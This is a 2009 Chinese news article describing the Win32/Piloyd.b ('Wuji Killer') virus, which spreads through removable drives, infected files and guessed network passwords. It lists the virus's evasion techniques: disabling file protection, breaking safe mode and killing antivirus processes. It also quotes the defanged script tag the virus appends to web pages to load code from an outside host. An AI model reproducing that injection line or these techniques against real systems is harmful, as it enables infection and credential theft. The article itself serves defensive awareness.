· [Java论坛][安全论坛][数据库论坛][操作系统论坛]
· [推荐] 江民安全专家永久免费 立即下载  RSA 2010
· [专题] 参与多核UTM调查 赢购物卡 谷歌遭攻击事件
· [IT技术周刊][IT资源下载专区][病毒求助专区]
· [热点] 《拆弹部队》藏木马 看Xbox360与PS3背后秘密
· [热点] 报告:PDF漏洞远超微软 十款免费电子邮件程序

“无极杀手”变种病毒20天感染37万台PC

发布时间:2009.11.17 18:08     来源:赛迪网    作者:Spark

【赛迪网-IT技术报道】11月16日,安全机构监测到,一个名为“无极杀手”变种b(Win32/Piloyd.b)的病毒正在互联网上疯狂传播,该病毒在短短20天的时间内就感染了37万余台计算机。

专家分析,病毒运行后,生成qmgr.dll病毒文件,加载sfc_os.dll并查找其5号导出函数,使得系统的文件保护对于其要修改的qmgr.dll失效,然后病毒从资源中读取数据写到qmgr.dll,修改该文件时间,并启动对应的服务。然后在系统目录下把自身复制为lsasvc.dll并在临时目录释放“TempDel.bat”以删除自身。

病检查当前模块所在进程是否为360tray.exe,如果是则创建一个名为"360SpShadow0"的设备,通过发送IO控制码的方式控制绕过360tray.exe的检测,完成后,退出程序。

查找当前系统中是否存在进程"360tray.exe",如果有,则

将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进程空间,从而第一步的内容得到执行,完成后,删除%SystemRoot%\system32\1l1.dll,同时清空hosts文件。

完成以上动作后,病毒会创建多个线程执行不同操作:

线程1:

将qmgr.dll对应的BITS服务启动类型设置为自动。

删除如下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network破坏安全模式

然后在临时文件夹内创建一个名为LiTdi.sys的驱动,创建名为LiTdi服务,并启动服务。查找相关杀毒软件或安全软件进程,并向驱动发送IO控制码的方式结束相关进程。

病毒还会调用IE访问hxxp://nbtj.114anhui.com/msn/163.htm做感染统计。

从表项中依次选择下载十几种恶意程序,其中多数为盗号木马。

病毒还会感染可移动存储设备上的exe,rar,htm,html,asp,aspx文件,对于扩展名为.rar的文件,病毒还会解包感染以上扩展名文件后再压缩回去。对于htm,html,asp,aspx的网页文件,

病毒会在其尾部加上“<script language=javascript src=hxxp://mm.aa88567.cn/index/mm.js></script>”的恶意代码,使得这些网页文件成为病毒的二次传播源,用户一旦点击这些被感染文件,则会被病毒感染。

病毒还会通过自动播放功能传播。查找可移动存储设备并在其根目录下生成autorun.inf,建立一个名为recycle.{645FF040-5081-101B-9F08-00AA002F954E}的文件夹,把%SystemRoot%\system32\dllcache\lsasvc.dll复制到该目录下为Ghost.exe。

通过自带的弱密钥列表对网上邻居进行猜解,被猜解成功的管理员账户密码的计算机将受到感染;如果连接成功,则将C:\WINDOWS\system32\dllcache\lsasvc.dll拷贝到对方机器的C:\cm.exe,同时创建计划任务以激活该病毒。

消息来源:江民

(责任编辑:尹聪颖)


[ 发表评论 ] 字体[  ] [ 打印 ] [ 进入博客 ] [ 进入论坛 ]  [ 推荐给朋友 ]
  相关文章
· 10月1%政府网站被黑 政府网站需加强防御 (11-17) · 10月病毒排行榜Top10 共感染1400万台次 (11-17)
· 气温骤降木马病毒黑客盯上天气预报网站 (11-17) · 令安全专家:黑客利用下载站"潜规则"传毒 (11-16)
· “义乌交友中心”、“池州信息港”等网站被挂 (11-16) · 盗号木马病毒新变种 窃取玩家信息 (11-12)
· 病毒利用系统漏洞传播病毒 下载恶意程序 (11-12) · 流氓软件冒充杀毒软件提示用户安装 (11-11)
· iPhone病毒作者现身:21岁澳大利亚青年 (11-11) · 梅勒斯变种关闭杀毒软件 108万网址挂马 (11-11)
  客户需求反馈表
* 姓  名:
更多资料  了解方案  认识厂商
* 单位名称:
* 联系电话:
* 电子邮件:
资讯 通信 IT产品 IT技术 信息化
日系家电齐陷巨亏泥潭 转型能否翻盘?
·首家网媒网站人民网A股..
·京东当当老总对骂 不拼..
·专题:五一小假未到 家..
拒绝雷同 NEC携909e在华掀起硬朗风
·微软发布Windows Phone ..
·直播:2012中国绿色产业..
·2012MWC移动通信世界大..
直播:中国LED产业年会论坛
·专题:服务器教育行业案..
·专题:回顾2009 原装耗..
·专题:HP Photosmart Pl..
选择2012:零售业的网络翅膀
·赛门铁克互联网安全威胁..
·突破云障碍 掌控云端..
·2012天融信巡展..
访问人数过多,请稍候访问